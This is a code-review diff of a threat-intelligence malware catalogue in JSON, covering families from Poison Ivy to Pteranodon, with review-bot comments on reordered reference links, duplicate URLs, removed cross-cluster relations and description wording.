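Review bot: the Poison Ivy `refs` hunk replaces 53 lines with 54, but comparing the `-` and `+` sides the only reference that is actually new is `https://engineers.ffri.jp/entry/2022/11/30/141346`; every other `+` line is a move (the nccgroup and FireEye `know-your-enemy` links, for example, are removed lower down and re-added near the top). A stable sort in the generator would shrink this to a one-line addition. The resulting list also keeps the same two documents under two hostnames, `https://vblocalhost.com/uploads/VB2020-20.pdf` beside `https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf` and the `VB2020-Ozawa-etal.pdf` pair likewise; these should be collapsed to one canonical URL each.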
@@ -36276,15 +38194,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "2abe89de-46dd-4dae-ae22-b49a593aff54",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7",
"value": "Poison Ivy"
},
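Review bot: the `related` block on the Poison Ivy cluster (the `similar` relation to `dest-uuid` `2abe89de-46dd-4dae-ae22-b49a593aff54`) is removed with no replacement, so the `7789fc1b-...` entry loses its only cross-cluster link. Confirm this is intended; if the relationship was dropped because the generator no longer reads it, either reintroduce it or explain in the commit message where that mapping now lives, since downstream users of the galaxy rely on `related` to correlate this cluster with others.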
@@ -36306,9 +38215,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat",
+ "http://fireeyeday.com/1604/pdf/KeyNote_2.pdf",
"https://youtu.be/DDA2uSxjVWY?t=344",
- "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf",
- "http://fireeyeday.com/1604/pdf/KeyNote_2.pdf"
+ "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf"
],
"synonyms": [
"KABOB",
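Review bot: this hunk only reorders the three non-Malpedia references without changing their content, and the same pure reorder appears in most hunks of this patch; that makes the real changes hard to spot and suggests the generator emits refs in an unstable order. Sorting refs deterministically (or preserving the upstream order) in the generator would keep future regenerations down to genuine additions and removals.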
@@ -36337,10 +38246,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke",
- "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
"https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.secureworks.com/research/threat-profiles/iron-hemlock"
+ "https://www.secureworks.com/research/threat-profiles/iron-hemlock",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
],
"synonyms": [],
"type": []
@@ -36361,33 +38270,47 @@
"uuid": "5ee77368-5e09-4016-ae73-82b99e830832",
"value": "Polyglot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyvice",
+ "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/",
+ "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "31017b7c-c023-4247-b37d-f15f2df5d25a",
+ "value": "PolyVice"
+ },
{
"description": "According to KnowBe4, Pony Stealer is a password stealer that can decrypt or unlock passwords for over 110 different applications including VPN, FTP, email, instant messaging, web browsers and much more. Pony Stealer is very dangerous and once it infects a PC it will turn the device into a botnet, allowing it to use the PCs it infects to infect other PCs.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pony",
- "https://intel471.com/blog/a-brief-history-of-ta505",
"https://www.secureworks.com/research/threat-profiles/gold-galleon",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
- "https://www.youtube.com/watch?v=EyDiIAt__dI",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://github.com/nyx0/Pony",
- "https://www.youtube.com/watch?v=y8Z9KnL8s8s",
- "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf",
- "https://www.youtube.com/watch?v=42yldTQ-fWA",
- "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
- "https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection",
- "http://www.secureworks.com/research/threat-profiles/gold-essex",
- "https://www.knowbe4.com/pony-stealer",
"https://www.secureworks.com/research/threat-profiles/gold-essex",
- "http://www.secureworks.com/research/threat-profiles/gold-galleon",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.knowbe4.com/pony-stealer",
+ "https://www.uperesia.com/analysis-of-a-packed-pony-downloader",
+ "https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.youtube.com/watch?v=y8Z9KnL8s8s",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf",
+ "https://github.com/nyx0/Pony",
"http://www.secureworks.com/research/threat-profiles/gold-evergreen",
+ "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
+ "http://www.secureworks.com/research/threat-profiles/gold-essex",
+ "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
"https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
- "https://www.uperesia.com/analysis-of-a-packed-pony-downloader"
+ "https://www.youtube.com/watch?v=42yldTQ-fWA",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "http://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://www.youtube.com/watch?v=EyDiIAt__dI",
+ "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf"
],
"synonyms": [
"Fareit",
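Review bot: the resulting refs list carries both scheme variants of the same SecureWorks profiles: `https://www.secureworks.com/research/threat-profiles/gold-essex` beside `http://www.secureworks.com/research/threat-profiles/gold-essex`, and the same pair for gold-evergreen and gold-galleon. Normalize the scheme (or dedupe on host plus path) in the generator so each source appears once.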
@@ -36412,17 +38335,30 @@
"uuid": "54327cbd-d30c-4684-9a66-18ae36b28399",
"value": "PoohMilk Loader"
},
+ {
+ "description": "According to Mandiant, POORTRY is a malware written as a driver, signed with a Microsoft Windows Hardware Compatibility Authenticode signature. This malware has been observed being used by UNC3944.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poortry",
+ "https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "17b87423-66e5-451e-8a84-5f4fd8bb2b01",
+ "value": "POORTRY"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poorweb",
- "https://securelist.com/apt-trends-report-q2-2018/86487/",
- "https://asec.ahnlab.com/ko/18796/",
"https://blog.reversinglabs.com/blog/poorweb-exploiting-document-formats",
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf",
+ "https://securelist.com/apt-trends-report-q2-2018/86487/",
"https://fortiguard.com/resources/threat-brief/2019/05/10/fortiguard-threat-intelligence-brief-may-10-2019",
- "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/"
+ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf",
+ "https://asec.ahnlab.com/ko/18796/"
],
"synonyms": [],
"type": []
@@ -36448,6 +38384,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.portdoor",
"https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
+ "https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba",
"https://www.cybereason.com/blog/research/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector",
"https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf"
],
@@ -36484,24 +38421,25 @@
"value": "poscardstealer"
},
{
- "description": "",
+ "description": "PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.\r\n\r\nPoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python3 implants with payloads written in PowerShell v2 and v4, C++ and C# source code, a variety of executables, DLLs and raw shellcode in addition to a Python3 payload. These enable C2 functionality on a wide range of devices and operating systems, including Windows, *nix and OSX.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2",
- "http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets",
- "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/",
- "https://paper.seebug.org/1301/",
- "https://ti.dbappsecurity.com.cn/blog/articles/2021/09/06/operation-maskface/",
- "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/",
- "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
"https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md",
"https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
- "https://github.com/nettitude/PoshC2_Python/",
- "https://redcanary.com/blog/getsystem-offsec/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://paper.seebug.org/1301/",
+ "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/",
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
+ "https://ti.dbappsecurity.com.cn/blog/articles/2021/09/06/operation-maskface/",
"https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf"
+ "https://github.com/nettitude/PoshC2_Python/",
+ "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/",
+ "http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets",
+ "https://redcanary.com/blog/getsystem-offsec/"
],
"synonyms": [],
"type": []
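Review bot: the new PoshC2 description embeds Windows line endings (`\r\n\r\n`) inside the JSON string and has a grammar slip (`comes PowerShell/C# and Python3 implants` is missing `with`), which suggests it was pasted verbatim from the project README. Other descriptions in this file are single plain-text paragraphs, so collapse the breaks and fix the wording before merging.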
@@ -36514,10 +38452,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp",
- "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/",
"https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf",
- "https://twitter.com/just_windex/status/1162118585805758464",
- "https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/"
+ "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/",
+ "https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/",
+ "https://twitter.com/just_windex/status/1162118585805758464"
],
"synonyms": [
"PUNCHTRACK"
@@ -36532,8 +38470,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poulight_stealer",
- "https://www.youtube.com/watch?v=MaPXDCq-Gf4",
"https://twitter.com/MBThreatIntel/status/1240389621638402049?s=20",
+ "https://www.youtube.com/watch?v=MaPXDCq-Gf4",
"https://www.carbonblack.com/blog/tau-threat-discovery-cryptocurrency-clipper-malware-evolves/",
"https://blog.360totalsecurity.com/en/a-txt-file-can-steal-all-your-secrets/?web_view=true"
],
@@ -36550,8 +38488,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.povlsomware",
- "https://youtu.be/oYLs6wuoOfg",
- "https://www.trendmicro.com/en_us/research/21/c/povlsomware-ransomware-features-cobalt-strike-compatibility.html"
+ "https://www.trendmicro.com/en_us/research/21/c/povlsomware-ransomware-features-cobalt-strike-compatibility.html",
+ "https://youtu.be/oYLs6wuoOfg"
],
"synonyms": [],
"type": []
@@ -36592,9 +38530,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.powercat",
- "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
+ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
"https://twitter.com/VK_Intel/status/1141540229951709184",
- "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+ "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/"
],
"synonyms": [],
"type": []
@@ -36607,8 +38545,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke",
- "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
- "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"
+ "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/"
],
"synonyms": [],
"type": []
@@ -36674,11 +38612,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff",
- "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf",
"https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/",
- "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/",
"https://lokalhost.pl/gozi_tree.txt",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2017"
+ "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2017",
+ "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf"
],
"synonyms": [
"PUNCHBUGGY"
@@ -36693,28 +38631,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://content.fireeye.com/apt/rpt-apt38",
"https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
- "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/"
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/",
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/"
],
"synonyms": [
"QUICKRIDE.POWER"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "1f1be19e-d1b5-408b-90a0-03ad27cc8924",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "606f778a-8b99-4880-8da8-b923651d627b",
"value": "PowerRatankba"
},
@@ -36737,16 +38666,16 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.predator",
"https://www.secureworks.com/research/threat-profiles/gold-galleon",
- "https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html",
+ "https://securelist.com/a-predatory-tale/89779",
"https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
"https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
"https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/",
+ "https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/",
"https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://securelist.com/a-predatory-tale/89779"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf"
],
"synonyms": [],
"type": []
@@ -36754,6 +38683,20 @@
"uuid": "54041c03-5714-4247-9226-3c801f59bc07",
"value": "Predator The Thief"
},
+ {
+ "description": "Ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prestige",
+ "https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/",
+ "https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "156b617e-2ae4-47a8-9498-6343b24cc6fe",
+ "value": "Prestige"
+ },
{
"description": "",
"meta": {
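Review bot: the new Prestige entry's description is only `Ransomware.`; the linked Microsoft post title already states that it impacted organizations in Ukraine and Poland, so a one-sentence description in the `According to <vendor>, ...` style used elsewhere in this file would make the entry meaningful in searches.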
@@ -36764,15 +38707,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "67ade442-63f2-4319-bdcd-d2564b963ed6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f",
"value": "Prikormka"
},
@@ -36787,15 +38721,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "523e8772-0610-424c-bcfb-9123bcb8328f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a0899fec-161d-4ba8-9594-8b5620c21705",
"value": "Prilex"
},
@@ -36815,21 +38740,24 @@
"value": "PrincessLocker"
},
{
- "description": "",
+ "description": "According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader",
- "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f",
- "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
"https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service",
+ "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
+ "https://tavares.re/blog/2022/06/06/hunting-privateloader-pay-per-install-service/",
+ "https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html",
+ "https://www.zscaler.com/blogs/security-research/peeking-privateloader",
"https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise",
"https://www.youtube.com/watch?v=Ldp7eESQotM",
- "https://www.zscaler.com/blogs/security-research/peeking-privateloader",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html",
- "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e",
"https://intel471.com/blog/privateloader-malware",
- "https://tavares.re/blog/2022/06/06/hunting-privateloader-pay-per-install-service/"
+ "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign",
+ "https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1"
],
"synonyms": [],
"type": []
@@ -36842,9 +38770,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.privatelog",
- "https://twitter.com/ESETresearch/status/1433819369784610828",
"https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html",
"https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques",
+ "https://twitter.com/ESETresearch/status/1433819369784610828",
"https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive"
],
"synonyms": [],
@@ -36872,9 +38800,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.prometei",
"https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
- "https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities",
"https://twitter.com/honeymoon_ioc/status/1494016518694309896",
- "https://twitter.com/honeymoon_ioc/status/1494311182550904840"
+ "https://blog.talosintelligence.com/prometei-botnet-improves/",
+ "https://twitter.com/honeymoon_ioc/status/1494311182550904840",
+ "https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities"
],
"synonyms": [],
"type": []
@@ -36887,16 +38816,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.prometheus",
- "https://medium.com/cycraft/prometheus-decryptor-6933e7bac1ea",
"https://unit42.paloaltonetworks.com/prometheus-ransomware/",
+ "https://medium.com/s2wlab/prometheus-x-spook-prometheus-ransomware-rebranded-spook-ransomware-6f93bd8ab5dd",
"https://therecord.media/decryptor-released-for-prometheus-ransomware-victims/",
+ "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware",
+ "https://twitter.com/inversecos/status/1441252744258461699?s=20",
"https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/",
"https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd",
"https://www.sentinelone.com/labs/spook-ransomware-prometheus-derivative-names-those-that-pay-shames-those-that-dont/",
- "https://twitter.com/inversecos/status/1441252744258461699?s=20",
"https://id-ransomware.blogspot.com/2021/05/prometheus-ransomware.html",
- "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware",
- "https://medium.com/s2wlab/prometheus-x-spook-prometheus-ransomware-rebranded-spook-ransomware-6f93bd8ab5dd"
+ "https://medium.com/cycraft/prometheus-decryptor-6933e7bac1ea"
],
"synonyms": [],
"type": []
@@ -36949,9 +38878,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.prynt_stealer",
- "https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed",
"https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/",
- "https://twitter.com/vxunderground/status/1519632014361640960"
+ "https://twitter.com/vxunderground/status/1519632014361640960",
+ "https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed"
],
"synonyms": [],
"type": []
@@ -36964,8 +38893,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pseudo_manuscrypt",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://ics-cert.kaspersky.com/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/",
"https://asec.ahnlab.com/en/31683/",
- "https://ics-cert.kaspersky.com/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/"
+ "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
+ "https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1"
],
"synonyms": [],
"type": []
@@ -36978,14 +38910,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.psix",
- "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/",
- "https://twitter.com/mesa_matt/status/1035211747957923840",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module",
"https://twitter.com/seckle_ch/status/1169558035649433600",
- "https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure"
+ "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/",
+ "https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://twitter.com/mesa_matt/status/1035211747957923840",
+ "https://blog.comodo.com/comodo-news/versions-of-psixbot/",
+ "https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module"
+ ],
+ "synonyms": [
+ "PsiXBot"
],
- "synonyms": [],
"type": []
},
"uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9",
@@ -36997,7 +38932,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a",
- "https://norfolkinfosec.com/a-lazarus-keylogger-pslogger/"
+ "https://norfolkinfosec.com/a-lazarus-keylogger-pslogger/",
+ "https://twitter.com/KevinPerlow/status/1160766519615381504"
],
"synonyms": [
"ECCENTRICBANDWAGON"
@@ -37027,28 +38963,31 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon",
- "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
- "https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/",
- "https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt",
- "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "https://www.bleepingcomputer.com/news/security/russian-gamaredon-hackers-use-8-new-malware-payloads-in-attacks/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine",
+ "https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/",
"https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations",
- "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game",
+ "https://www.bleepingcomputer.com/news/security/russian-gamaredon-hackers-use-8-new-malware-payloads-in-attacks/",
+ "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf",
+ "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/",
+ "https://cert.gov.ua/news/42",
"https://blogs.cisco.com/security/network-footprints-of-gamaredon-group",
- "https://blog.threatstop.com/russian-apt-gamaredon-group",
